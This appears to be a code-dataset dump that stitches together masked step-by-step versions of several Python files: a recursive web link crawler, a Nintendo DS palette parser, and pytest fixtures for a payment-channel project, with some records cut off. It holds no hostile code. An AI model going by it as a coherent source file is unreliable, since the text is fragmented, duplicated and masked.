{ "blob_id": "5ddfeb49c16a7452c99126f1a837f3c0bed0ec10", "index": 300, "step-1": "<mask token>\n\n\ndef getExternalLinks(bs, excludeUrl):\n externalLinks = []\n for link in bs.find_all('a', href=re.compile('^(http|www)((?!' +\n excludeUrl + ').)*$')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in externalLinks:\n externalLinks.append(link.attrs['href'])\n return externalLinks\n\n\n<mask token>\n\n\ndef followExternalOnly(startingSite):\n externalLink = getRandomExternalLink(startingSite)\n print(f'Random external link is: {externalLink}')\n followExternalOnly(externalLink)\n", "step-2": "<mask token>\n\n\ndef getExternalLinks(bs, excludeUrl):\n externalLinks = []\n for link in bs.find_all('a', href=re.compile('^(http|www)((?!' +\n excludeUrl + ').)*$')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in externalLinks:\n externalLinks.append(link.attrs['href'])\n return externalLinks\n\n\n<mask token>\n\n\ndef getAllExternalLinks(siteUrl):\n html = requests.get(siteUrl)\n domain = f'{urlparse(siteUrl).scheme}://{urlparse(siteUrl).netloc}'\n bs = BeautifulSoup(html.text, 'html.parser')\n internalLinks = getInternalLinks(bs, domain)\n externalLinks = getExternalLinks(bs, domain)\n for link in externalLinks:\n if link not in allExtLinks:\n allExtLinks.add(link)\n print(link)\n for link in internalLinks:\n if link not in allIntLinks:\n allIntLinks.add(link)\n getAllExternalLinks(link)\n\n\ndef followExternalOnly(startingSite):\n externalLink = getRandomExternalLink(startingSite)\n print(f'Random external link is: {externalLink}')\n followExternalOnly(externalLink)\n", "step-3": "<mask token>\n\n\ndef getInternalLinks(bs, includeUrl):\n includeUrl = (\n f'{urlparse(includeUrl).scheme}://{urlparse(includeUrl).netloc}')\n internalLinks = []\n for link in bs.find_all('a', href=re.compile('^(/|.*' + includeUrl + ')')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in internalLinks:\n if link.attrs['href'].startswith('/'):\n internalLinks.append(includeUrl + link.attrs['href'])\n else:\n internalLinks.append(link.attrs['href'])\n return internalLinks\n\n\ndef getExternalLinks(bs, excludeUrl):\n externalLinks = []\n for link in bs.find_all('a', href=re.compile('^(http|www)((?!' +\n excludeUrl + ').)*$')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in externalLinks:\n externalLinks.append(link.attrs['href'])\n return externalLinks\n\n\n<mask token>\n\n\ndef getAllExternalLinks(siteUrl):\n html = requests.get(siteUrl)\n domain = f'{urlparse(siteUrl).scheme}://{urlparse(siteUrl).netloc}'\n bs = BeautifulSoup(html.text, 'html.parser')\n internalLinks = getInternalLinks(bs, domain)\n externalLinks = getExternalLinks(bs, domain)\n for link in externalLinks:\n if link not in allExtLinks:\n allExtLinks.add(link)\n print(link)\n for link in internalLinks:\n if link not in allIntLinks:\n allIntLinks.add(link)\n getAllExternalLinks(link)\n\n\ndef followExternalOnly(startingSite):\n externalLink = getRandomExternalLink(startingSite)\n print(f'Random external link is: {externalLink}')\n followExternalOnly(externalLink)\n", "step-4": "<mask token>\n\n\ndef getInternalLinks(bs, includeUrl):\n includeUrl = (\n f'{urlparse(includeUrl).scheme}://{urlparse(includeUrl).netloc}')\n internalLinks = []\n for link in bs.find_all('a', href=re.compile('^(/|.*' + includeUrl + ')')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in internalLinks:\n if link.attrs['href'].startswith('/'):\n internalLinks.append(includeUrl + link.attrs['href'])\n else:\n internalLinks.append(link.attrs['href'])\n return internalLinks\n\n\ndef getExternalLinks(bs, excludeUrl):\n externalLinks = []\n for link in bs.find_all('a', href=re.compile('^(http|www)((?!' +\n excludeUrl + ').)*$')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in externalLinks:\n externalLinks.append(link.attrs['href'])\n return externalLinks\n\n\ndef getRandomExternalLink(startingPage):\n html = requests.get(startingPage)\n bs = BeautifulSoup(html.text, 'html.parser')\n externalLinks = getExternalLinks(bs, urlparse(startingPage).netloc)\n if len(externalLinks) == 0:\n print('No external links, looking around the site for one.')\n domain = (\n f'{urlparse(startingPage).scheme}://{urlparse(startingPage).netloc}'\n )\n internalLinks = getInternalLinks(bs, domain)\n return getRandomExternalLink(internalLinks[random.randint(0, len(\n internalLinks) - 1)])\n else:\n return externalLinks[random.randint(0, len(externalLinks) - 1)]\n\n\n<mask token>\n\n\ndef getAllExternalLinks(siteUrl):\n html = requests.get(siteUrl)\n domain = f'{urlparse(siteUrl).scheme}://{urlparse(siteUrl).netloc}'\n bs = BeautifulSoup(html.text, 'html.parser')\n internalLinks = getInternalLinks(bs, domain)\n externalLinks = getExternalLinks(bs, domain)\n for link in externalLinks:\n if link not in allExtLinks:\n allExtLinks.add(link)\n print(link)\n for link in internalLinks:\n if link not in allIntLinks:\n allIntLinks.add(link)\n getAllExternalLinks(link)\n\n\ndef followExternalOnly(startingSite):\n externalLink = getRandomExternalLink(startingSite)\n print(f'Random external link is: {externalLink}')\n followExternalOnly(externalLink)\n", "step-5": "import requests\nfrom urllib.parse import urlparse\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\nimport random\n\npages = set()\n\n# Retrieve a list of all Internal links foound on a page.\ndef getInternalLinks(bs, includeUrl):\n includeUrl = f'{urlparse(includeUrl).scheme}://{urlparse(includeUrl).netloc}'\n internalLinks = []\n # Finds all links thhat begin with a \"/\"\n for link in bs.find_all('a',\n href=re.compile('^(/|.*'+includeUrl+')')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in internalLinks:\n if link.attrs['href'].startswith('/'):\n internalLinks.append(includeUrl+link.attrs['href'])\n else:\n internalLinks.append(link.attrs['href'])\n return internalLinks\n\n# Retrieves a list of all external links found on a pagee.\ndef getExternalLinks(bs, excludeUrl):\n externalLinks = []\n # Finds all links that starts with \"http\" that do\n # not contain the current URL\n for link in bs.find_all('a',\n href=re.compile('^(http|www)((?!'+excludeUrl+').)*$')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in externalLinks:\n externalLinks.append(link.attrs['href'])\n return externalLinks\n\ndef getRandomExternalLink(startingPage):\n html = requests.get(startingPage)\n bs = BeautifulSoup(html.text, 'html.parser')\n externalLinks = getExternalLinks(bs, \n urlparse(startingPage).netloc)\n if len(externalLinks) == 0:\n print('No external links, looking around the site for one.')\n domain = f'{urlparse(startingPage).scheme}://{urlparse(startingPage).netloc}'\n internalLinks = getInternalLinks(bs, domain)\n return getRandomExternalLink(internalLinks[random.randint(0, len(internalLinks)-1)])\n else:\n return externalLinks[random.randint(0, len(externalLinks)-1)]\n\n# Collects a list of all external URLs found on the site\nallExtLinks = set()\nallIntLinks = set()\n\ndef getAllExternalLinks(siteUrl):\n html = requests.get(siteUrl)\n domain = f\"{urlparse(siteUrl).scheme}://{urlparse(siteUrl).netloc}\"\n bs = BeautifulSoup(html.text, 'html.parser')\n internalLinks = getInternalLinks(bs, domain)\n externalLinks = getExternalLinks(bs, domain)\n for link in externalLinks:\n if link not in allExtLinks:\n allExtLinks.add(link)\n print(link)\n for link in internalLinks:\n if link not in allIntLinks:\n allIntLinks.add(link)\n getAllExternalLinks(link)\n\n\ndef followExternalOnly(startingSite):\n externalLink = getRandomExternalLink(startingSite)\n print(f\"Random external link is: {externalLink}\")\n followExternalOnly(externalLink)\n\n\n", "step-ids": [ 2, 3, 4, 5, 8 ] }
[ 2, 3, 4, 5, 8 ]
import array from PIL import Image from generic.editable import XEditable as Editable class PLTT(Editable): """Palette information""" FORMAT_16BIT = 3 FORMAT_256BIT = 4 def define(self, clr): self.clr = clr self.string('magic', length=4, default='PLTT') # not reversed self.uint32('size_') self.uint32('format') self.uint32('extended') self.uint32('datasize') self.uint32('offset') self.data = '' def load(self, reader): Editable.load(self, reader) self.data = array.array('H', reader.read(self.datasize)) def save(self, writer): writer = Editable.save(self, writer) ofs = writer.tell() writer.write(self.data.tostring()) writer.writePadding(ofs+self.datasize) return writer def get_palettes(self): palettes = [] if self.format == self.FORMAT_16BIT: num = 16 elif self.format == self.FORMAT_256BIT: num = 256 start = 0 for pal_id in range(len(self.data)/num): palette = [] for i in range(num): val = self.data[start+i] palette.append((((val >> 0) & 0x1f) << 3, ((val >> 5) & 0x1f) << 3, ((val >> 10) & 0x1f) << 3, 255)) start += num palettes.append(palette) return palettes def get_palette(self, pal_id, transparent=True): palette = [] if self.format == self.FORMAT_16BIT: num = 16 elif self.format == self.FORMAT_256BIT: num = 256 start = pal_id*num for i in range(num): if not num and transparent: palette.append(chr(0)*4) continue val = self.data[start+i] palette.append(chr(((val >> 0) & 0x1f) << 3) + chr(((val >> 5) & 0x1f) << 3) + chr(((val >> 10) & 0x1f) << 3) + chr(255)) return palette def set_palette(self, pal_id, palette): """ Parameters ---------- pal_id : int palette : list of tuple List of 4-/3-int-tuple colors """ if self.format == self.FORMAT_16BIT: num = 16 elif self.format == self.FORMAT_256BIT: num = 256 start = pal_id*num for i, color in enumerate(palette): if i > num: break r, g, b = color[:3] self.data[start+i] = ((r >> 3) | (g >> 3 << 5) | (b >> 3 << 10)) class NCLR(Editable): """2d color information """ def define(self): self.string('magic', length=4, default='RLCN') self.uint16('endian', default=0xFFFE) self.uint16('version', default=0x101) self.uint32('size_') self.uint16('headersize', default=0x10) self.uint16('numblocks', default=1) self.pltt = PLTT(self) def load(self, reader): Editable.load(self, reader) assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic) self.pltt.load(reader) def save(self, writer=None): writer = Editable.save(self, writer) writer = self.pltt.save(writer) return writer def get_palette(self, pal_id=0, transparent=True): return self.pltt.get_palette(pal_id, transparent) def get_palettes(self): return self.pltt.get_palettes() def set_palette(self, pal_id, palette): return self.pltt.set_palette(pal_id, palette)
normal
{ "blob_id": "2fadc5c90d1bae14c57fc3bf02582e12aa8abdf6", "index": 790, "step-1": "<mask token>\n\n\nclass PLTT(Editable):\n <mask token>\n <mask token>\n <mask token>\n\n def define(self, clr):\n self.clr = clr\n self.string('magic', length=4, default='PLTT')\n self.uint32('size_')\n self.uint32('format')\n self.uint32('extended')\n self.uint32('datasize')\n self.uint32('offset')\n self.data = ''\n\n def load(self, reader):\n Editable.load(self, reader)\n self.data = array.array('H', reader.read(self.datasize))\n\n def save(self, writer):\n writer = Editable.save(self, writer)\n ofs = writer.tell()\n writer.write(self.data.tostring())\n writer.writePadding(ofs + self.datasize)\n return writer\n\n def get_palettes(self):\n palettes = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = 0\n for pal_id in range(len(self.data) / num):\n palette = []\n for i in range(num):\n val = self.data[start + i]\n palette.append(((val >> 0 & 31) << 3, (val >> 5 & 31) << 3,\n (val >> 10 & 31) << 3, 255))\n start += num\n palettes.append(palette)\n return palettes\n <mask token>\n <mask token>\n\n\nclass NCLR(Editable):\n \"\"\"2d color information\n \"\"\"\n\n def define(self):\n self.string('magic', length=4, default='RLCN')\n self.uint16('endian', default=65534)\n self.uint16('version', default=257)\n self.uint32('size_')\n self.uint16('headersize', default=16)\n self.uint16('numblocks', default=1)\n self.pltt = PLTT(self)\n\n def load(self, reader):\n Editable.load(self, reader)\n assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic)\n self.pltt.load(reader)\n\n def save(self, writer=None):\n writer = Editable.save(self, writer)\n writer = self.pltt.save(writer)\n return writer\n\n def get_palette(self, pal_id=0, transparent=True):\n return self.pltt.get_palette(pal_id, transparent)\n\n def get_palettes(self):\n return self.pltt.get_palettes()\n\n def set_palette(self, pal_id, palette):\n return self.pltt.set_palette(pal_id, palette)\n", "step-2": "<mask token>\n\n\nclass PLTT(Editable):\n <mask token>\n <mask token>\n <mask token>\n\n def define(self, clr):\n self.clr = clr\n self.string('magic', length=4, default='PLTT')\n self.uint32('size_')\n self.uint32('format')\n self.uint32('extended')\n self.uint32('datasize')\n self.uint32('offset')\n self.data = ''\n\n def load(self, reader):\n Editable.load(self, reader)\n self.data = array.array('H', reader.read(self.datasize))\n\n def save(self, writer):\n writer = Editable.save(self, writer)\n ofs = writer.tell()\n writer.write(self.data.tostring())\n writer.writePadding(ofs + self.datasize)\n return writer\n\n def get_palettes(self):\n palettes = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = 0\n for pal_id in range(len(self.data) / num):\n palette = []\n for i in range(num):\n val = self.data[start + i]\n palette.append(((val >> 0 & 31) << 3, (val >> 5 & 31) << 3,\n (val >> 10 & 31) << 3, 255))\n start += num\n palettes.append(palette)\n return palettes\n <mask token>\n\n def set_palette(self, pal_id, palette):\n \"\"\"\n\n Parameters\n ----------\n pal_id : int\n palette : list of tuple\n List of 4-/3-int-tuple colors\n \"\"\"\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id * num\n for i, color in enumerate(palette):\n if i > num:\n break\n r, g, b = color[:3]\n self.data[start + i] = r >> 3 | g >> 3 << 5 | b >> 3 << 10\n\n\nclass NCLR(Editable):\n \"\"\"2d color information\n \"\"\"\n\n def define(self):\n self.string('magic', length=4, default='RLCN')\n self.uint16('endian', default=65534)\n self.uint16('version', default=257)\n self.uint32('size_')\n self.uint16('headersize', default=16)\n self.uint16('numblocks', default=1)\n self.pltt = PLTT(self)\n\n def load(self, reader):\n Editable.load(self, reader)\n assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic)\n self.pltt.load(reader)\n\n def save(self, writer=None):\n writer = Editable.save(self, writer)\n writer = self.pltt.save(writer)\n return writer\n\n def get_palette(self, pal_id=0, transparent=True):\n return self.pltt.get_palette(pal_id, transparent)\n\n def get_palettes(self):\n return self.pltt.get_palettes()\n\n def set_palette(self, pal_id, palette):\n return self.pltt.set_palette(pal_id, palette)\n", "step-3": "<mask token>\n\n\nclass PLTT(Editable):\n <mask token>\n <mask token>\n <mask token>\n\n def define(self, clr):\n self.clr = clr\n self.string('magic', length=4, default='PLTT')\n self.uint32('size_')\n self.uint32('format')\n self.uint32('extended')\n self.uint32('datasize')\n self.uint32('offset')\n self.data = ''\n\n def load(self, reader):\n Editable.load(self, reader)\n self.data = array.array('H', reader.read(self.datasize))\n\n def save(self, writer):\n writer = Editable.save(self, writer)\n ofs = writer.tell()\n writer.write(self.data.tostring())\n writer.writePadding(ofs + self.datasize)\n return writer\n\n def get_palettes(self):\n palettes = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = 0\n for pal_id in range(len(self.data) / num):\n palette = []\n for i in range(num):\n val = self.data[start + i]\n palette.append(((val >> 0 & 31) << 3, (val >> 5 & 31) << 3,\n (val >> 10 & 31) << 3, 255))\n start += num\n palettes.append(palette)\n return palettes\n\n def get_palette(self, pal_id, transparent=True):\n palette = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id * num\n for i in range(num):\n if not num and transparent:\n palette.append(chr(0) * 4)\n continue\n val = self.data[start + i]\n palette.append(chr((val >> 0 & 31) << 3) + chr((val >> 5 & 31) <<\n 3) + chr((val >> 10 & 31) << 3) + chr(255))\n return palette\n\n def set_palette(self, pal_id, palette):\n \"\"\"\n\n Parameters\n ----------\n pal_id : int\n palette : list of tuple\n List of 4-/3-int-tuple colors\n \"\"\"\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id * num\n for i, color in enumerate(palette):\n if i > num:\n break\n r, g, b = color[:3]\n self.data[start + i] = r >> 3 | g >> 3 << 5 | b >> 3 << 10\n\n\nclass NCLR(Editable):\n \"\"\"2d color information\n \"\"\"\n\n def define(self):\n self.string('magic', length=4, default='RLCN')\n self.uint16('endian', default=65534)\n self.uint16('version', default=257)\n self.uint32('size_')\n self.uint16('headersize', default=16)\n self.uint16('numblocks', default=1)\n self.pltt = PLTT(self)\n\n def load(self, reader):\n Editable.load(self, reader)\n assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic)\n self.pltt.load(reader)\n\n def save(self, writer=None):\n writer = Editable.save(self, writer)\n writer = self.pltt.save(writer)\n return writer\n\n def get_palette(self, pal_id=0, transparent=True):\n return self.pltt.get_palette(pal_id, transparent)\n\n def get_palettes(self):\n return self.pltt.get_palettes()\n\n def set_palette(self, pal_id, palette):\n return self.pltt.set_palette(pal_id, palette)\n", "step-4": "<mask token>\n\n\nclass PLTT(Editable):\n <mask token>\n FORMAT_16BIT = 3\n FORMAT_256BIT = 4\n\n def define(self, clr):\n self.clr = clr\n self.string('magic', length=4, default='PLTT')\n self.uint32('size_')\n self.uint32('format')\n self.uint32('extended')\n self.uint32('datasize')\n self.uint32('offset')\n self.data = ''\n\n def load(self, reader):\n Editable.load(self, reader)\n self.data = array.array('H', reader.read(self.datasize))\n\n def save(self, writer):\n writer = Editable.save(self, writer)\n ofs = writer.tell()\n writer.write(self.data.tostring())\n writer.writePadding(ofs + self.datasize)\n return writer\n\n def get_palettes(self):\n palettes = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = 0\n for pal_id in range(len(self.data) / num):\n palette = []\n for i in range(num):\n val = self.data[start + i]\n palette.append(((val >> 0 & 31) << 3, (val >> 5 & 31) << 3,\n (val >> 10 & 31) << 3, 255))\n start += num\n palettes.append(palette)\n return palettes\n\n def get_palette(self, pal_id, transparent=True):\n palette = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id * num\n for i in range(num):\n if not num and transparent:\n palette.append(chr(0) * 4)\n continue\n val = self.data[start + i]\n palette.append(chr((val >> 0 & 31) << 3) + chr((val >> 5 & 31) <<\n 3) + chr((val >> 10 & 31) << 3) + chr(255))\n return palette\n\n def set_palette(self, pal_id, palette):\n \"\"\"\n\n Parameters\n ----------\n pal_id : int\n palette : list of tuple\n List of 4-/3-int-tuple colors\n \"\"\"\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id * num\n for i, color in enumerate(palette):\n if i > num:\n break\n r, g, b = color[:3]\n self.data[start + i] = r >> 3 | g >> 3 << 5 | b >> 3 << 10\n\n\nclass NCLR(Editable):\n \"\"\"2d color information\n \"\"\"\n\n def define(self):\n self.string('magic', length=4, default='RLCN')\n self.uint16('endian', default=65534)\n self.uint16('version', default=257)\n self.uint32('size_')\n self.uint16('headersize', default=16)\n self.uint16('numblocks', default=1)\n self.pltt = PLTT(self)\n\n def load(self, reader):\n Editable.load(self, reader)\n assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic)\n self.pltt.load(reader)\n\n def save(self, writer=None):\n writer = Editable.save(self, writer)\n writer = self.pltt.save(writer)\n return writer\n\n def get_palette(self, pal_id=0, transparent=True):\n return self.pltt.get_palette(pal_id, transparent)\n\n def get_palettes(self):\n return self.pltt.get_palettes()\n\n def set_palette(self, pal_id, palette):\n return self.pltt.set_palette(pal_id, palette)\n", "step-5": "\nimport array\n\nfrom PIL import Image\n\nfrom generic.editable import XEditable as Editable\n\n\nclass PLTT(Editable):\n \"\"\"Palette information\"\"\"\n FORMAT_16BIT = 3\n FORMAT_256BIT = 4\n\n def define(self, clr):\n self.clr = clr\n self.string('magic', length=4, default='PLTT') # not reversed\n self.uint32('size_')\n self.uint32('format')\n self.uint32('extended')\n self.uint32('datasize')\n self.uint32('offset')\n self.data = ''\n\n def load(self, reader):\n Editable.load(self, reader)\n self.data = array.array('H', reader.read(self.datasize))\n\n def save(self, writer):\n writer = Editable.save(self, writer)\n ofs = writer.tell()\n writer.write(self.data.tostring())\n writer.writePadding(ofs+self.datasize)\n return writer\n\n def get_palettes(self):\n palettes = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = 0\n for pal_id in range(len(self.data)/num):\n palette = []\n for i in range(num):\n val = self.data[start+i]\n palette.append((((val >> 0) & 0x1f) << 3,\n ((val >> 5) & 0x1f) << 3,\n ((val >> 10) & 0x1f) << 3,\n 255))\n start += num\n palettes.append(palette)\n return palettes\n\n def get_palette(self, pal_id, transparent=True):\n palette = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id*num\n for i in range(num):\n if not num and transparent:\n palette.append(chr(0)*4)\n continue\n val = self.data[start+i]\n palette.append(chr(((val >> 0) & 0x1f) << 3) +\n chr(((val >> 5) & 0x1f) << 3) +\n chr(((val >> 10) & 0x1f) << 3) +\n chr(255))\n return palette\n\n def set_palette(self, pal_id, palette):\n \"\"\"\n\n Parameters\n ----------\n pal_id : int\n palette : list of tuple\n List of 4-/3-int-tuple colors\n \"\"\"\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id*num\n for i, color in enumerate(palette):\n if i > num:\n break\n r, g, b = color[:3]\n self.data[start+i] = ((r >> 3) |\n (g >> 3 << 5) |\n (b >> 3 << 10))\n\n\nclass NCLR(Editable):\n \"\"\"2d color information\n \"\"\"\n def define(self):\n self.string('magic', length=4, default='RLCN')\n self.uint16('endian', default=0xFFFE)\n self.uint16('version', default=0x101)\n self.uint32('size_')\n self.uint16('headersize', default=0x10)\n self.uint16('numblocks', default=1)\n self.pltt = PLTT(self)\n\n def load(self, reader):\n Editable.load(self, reader)\n assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic)\n self.pltt.load(reader)\n\n def save(self, writer=None):\n writer = Editable.save(self, writer)\n writer = self.pltt.save(writer)\n return writer\n\n def get_palette(self, pal_id=0, transparent=True):\n return self.pltt.get_palette(pal_id, transparent)\n\n def get_palettes(self):\n return self.pltt.get_palettes()\n\n def set_palette(self, pal_id, palette):\n return self.pltt.set_palette(pal_id, palette)\n", "step-ids": [ 13, 14, 15, 16, 19 ] }
[ 13, 14, 15, 16, 19 ]
import pytest from eth_utils import encode_hex, remove_0x_prefix from ethereum.tester import keys import os import json from microraiden.client.client import CHANNEL_MANAGER_ABI_NAME, TOKEN_ABI_NAME from microraiden.crypto import privkey_to_addr @pytest.fixture def contracts_relative_path(): return 'data/contracts.json' @pytest.fixture def compiled_contracts_path(test_dir, contracts_relative_path): return os.path.join(test_dir, contracts_relative_path) @pytest.fixture def compiled_contracts(compiled_contracts_path): return json.load(open(compiled_contracts_path)) @pytest.fixture def test_dir(): return os.path.dirname(os.path.dirname(__file__)) + "/../" @pytest.fixture(scope='session') def use_tester(request): return request.config.getoption('use_tester') @pytest.fixture def api_endpoint(): """address of a paywall proxy""" return 'localhost' @pytest.fixture def api_endpoint_port(): """port the paywall proxy listens on""" return 5000 @pytest.fixture def api_endpoint_address(api_endpoint, api_endpoint_port): return api_endpoint + ":" + str(api_endpoint_port) @pytest.fixture def init_contract_address(): return "0x" + "a" * 40 @pytest.fixture def manager_state_path(): return '/tmp/rmp-state.pkl' @pytest.fixture(scope='session') def deployer_privkey(): return remove_0x_prefix(encode_hex(keys[3])) @pytest.fixture(scope='session') def deployer_address(deployer_privkey): return privkey_to_addr(deployer_privkey) @pytest.fixture(scope='session') def contract_abi_path(): return os.path.join(os.path.dirname(os.path.dirname(__file__)), '../data/contracts.json') @pytest.fixture(scope='session') def contract_abis(contract_abi_path): abi_file = open(contract_abi_path, 'r') return json.load(abi_file) @pytest.fixture(scope='session') def channel_manager_abi(contract_abis): return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi'] @pytest.fixture(scope='session') def channel_manager_bytecode(contract_abis): return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode'] @pytest.fixture(scope='session') def token_abi(contract_abis): return contract_abis[TOKEN_ABI_NAME]['abi'] @pytest.fixture(scope='session') def token_bytecode(contract_abis): return contract_abis[TOKEN_ABI_NAME]['bytecode'] @pytest.fixture(scope='session') def kovan_block_time(): return 4
normal
{ "blob_id": "438fe1ccf265706e202d7cc6044e57590f29801f", "index": 9375, "step-1": "<mask token>\n\n\[email protected]\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\[email protected]\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\[email protected]\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\[email protected]\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\[email protected]\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\[email protected]\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\[email protected]\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\[email protected]\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\[email protected]\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\[email protected]\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\[email protected]\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\[email protected]\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\[email protected]\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\[email protected]\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\[email protected]\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\[email protected]\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\[email protected]\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\[email protected]\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + '/../'\n\n\[email protected](scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\[email protected]\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\[email protected]\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\[email protected]\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\[email protected]\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef deployer_privkey():\n return remove_0x_prefix(encode_hex(keys[3]))\n\n\[email protected](scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\[email protected](scope='session')\ndef channel_manager_abi(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef token_bytecode(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef kovan_block_time():\n return 4\n", "step-4": "<mask token>\n\n\[email protected]\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\[email protected]\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\[email protected]\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\[email protected]\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + '/../'\n\n\[email protected](scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\[email protected]\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\[email protected]\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\[email protected]\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\[email protected]\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\[email protected]\ndef manager_state_path():\n return '/tmp/rmp-state.pkl'\n\n\[email protected](scope='session')\ndef deployer_privkey():\n return remove_0x_prefix(encode_hex(keys[3]))\n\n\[email protected](scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\[email protected](scope='session')\ndef channel_manager_abi(contract_abis):\n return 